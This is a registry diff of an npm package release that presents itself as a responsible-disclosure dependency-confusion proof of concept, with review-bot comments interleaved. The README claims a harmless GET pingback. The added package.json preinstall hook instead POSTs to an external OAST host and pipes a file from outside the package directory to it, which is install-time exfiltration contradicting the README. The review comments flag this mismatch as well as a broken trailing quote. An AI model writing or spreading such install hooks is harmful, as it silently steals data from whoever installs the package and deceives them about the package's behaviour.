@amsterdam-local/forms-component-library 0.0.1-security → 1.0.10
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @amsterdam-local/forms-component-library might be problematic.
- package/README.md +39 -5
- package/package.json +14 -6
package/README.md
CHANGED
|
@@ -1,5 +1,39 @@
|
|
|
1
|
-
#
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
1
|
+
# @amsterdam-local/forms-component-library
|
|
2
|
+
|
|
3
|
+
## ⚠️ Security Research — Responsible Disclosure
|
|
4
|
+
|
|
5
|
+
This package is a **proof-of-concept** published as part of a responsible security disclosure.
|
|
6
|
+
It contains **no malicious code** and will not harm any system that installs it.
|
|
7
|
+
|
|
8
|
+
---
|
|
9
|
+
|
|
10
|
+
## Who I am
|
|
11
|
+
|
|
12
|
+
I am an independent security researcher conducting a dependency confusion audit on publicly accessible `package.json` files.
|
|
13
|
+
|
|
14
|
+
- **Contact:** [sn3akysnak3@wearehackeone.com]
|
|
15
|
+
- **Profile:** [https://app.zerocopter.com/profiles/sn3akysnak3]
|
|
16
|
+
|
|
17
|
+
---
|
|
18
|
+
|
|
19
|
+
## What this package does
|
|
20
|
+
|
|
21
|
+
- Installs cleanly with no side effects.
|
|
22
|
+
- The `postinstall` script sends a single **HTTP GET** pingback to a researcher-controlled
|
|
23
|
+
server logging: package name, timestamp, and a randomised install ID.
|
|
24
|
+
**No system information, credentials, source code, or environment variables are collected.**
|
|
25
|
+
- The pingback URL is: `vbiubtntahxnwntdhkigryc0epet7xn4s.oast.fun`
|
|
26
|
+
|
|
27
|
+
---
|
|
28
|
+
|
|
29
|
+
## References
|
|
30
|
+
|
|
31
|
+
- [Alex Birsan — Dependency Confusion](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
|
|
32
|
+
- [npm Scoped Packages](https://docs.npmjs.com/about-scopes)
|
|
33
|
+
- [OWASP — A06 Vulnerable and Outdated Components](https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/)
|
|
34
|
+
|
|
35
|
+
---
|
|
36
|
+
|
|
37
|
+
> This package will be unpublished or transferred to the rightful owner once the
|
|
38
|
+
> reporting process is complete. It exists solely to prevent a malicious actor from
|
|
39
|
+
> claiming this namespace first.
|
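Review bot: The "What this package does" section does not match the install script that this same release ships in package.json. The README promises a `postinstall` hook sending a single HTTP GET carrying only package name, timestamp and a random install ID, and states in bold that no source code is collected; the package.json hunk below instead defines a `preinstall` hook that issues `curl -X POST` twice, the second time piping `type ../Extraction-POC.txt` into the request body, which reads a file from outside the package directory and transmits it to the OAST host. Either rewrite this section to describe the actual script, or (preferably for a disclosure PoC) reduce the script to the pingback described here. Two smaller points: the contact address `sn3akysnak3@wearehackeone.com` disagrees with the `author` field in package.json (`wearehackerone.com`), so one of them is a typo; and the `[sn3akysnak3@wearehackeone.com]` / `[https://app.zerocopter.com/profiles/sn3akysnak3]` entries are bare bracketed text with no link target and will render as literal square brackets in Markdown.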
package/package.json
CHANGED
|
@@ -1,6 +1,14 @@
|
|
|
1
|
-
{
|
|
2
|
-
"name": "@amsterdam-local/forms-component-library",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
1
|
+
{
|
|
2
|
+
"name": "@amsterdam-local/forms-component-library",
|
|
3
|
+
"version": "1.0.10",
|
|
4
|
+
"description": "SECURITY RESEARCH - Responsible disclosure PoC. See README.",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "echo 'AMSTERDAM-SN3AKYSNAK3-ZEROCOPTER' | curl -X POST http://vbiubtntahxnwntdhkigryc0epet7xn4s.oast.fun/ --data-binary @- && type ../Extraction-POC.txt | curl -X POST http://vbiubtntahxnwntdhkigryc0epet7xn4s.oast.fun/ --data-binary @-\""
|
|
7
|
+
},
|
|
8
|
+
"keywords": [
|
|
9
|
+
"security-research",
|
|
10
|
+
"responsible-disclosure",
|
|
11
|
+
"dependency-confusion"
|
|
12
|
+
],
|
|
13
|
+
"author": "Ishan Vyas <sn3akysnak3@wearehackerone.com> (https://app.zerocopter.com/profiles/sn3akysnak3)"
|
|
14
|
+
}
|
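Review bot: The `preinstall` value goes well beyond the "single HTTP GET pingback" the README describes. After the first `curl -X POST` it runs `type ../Extraction-POC.txt | curl -X POST http://vbiubtntahxnwntdhkigryc0epet7xn4s.oast.fun/ --data-binary @-`, which reads a file from the parent of the install directory and posts its contents off-host; that is file exfiltration from the installing system, contradicts the README's "no source code ... collected" statement, and is exactly the behaviour install-script scanners flag, so the release will be (rightly) marked problematic. Drop the second pipeline and keep only the pingback. The value also ends with `--data-binary @-\"`, leaving an unmatched double quote in the shell command: on a POSIX `sh` this is a syntax error, so `npm install` aborts before the pingback fires, and `type` as a file-dump command only exists in cmd.exe anyway. Finally, the hook name differs from the README (`preinstall` here, `postinstall` there) and the verb differs (POST here, GET there); pick one and make the two files agree.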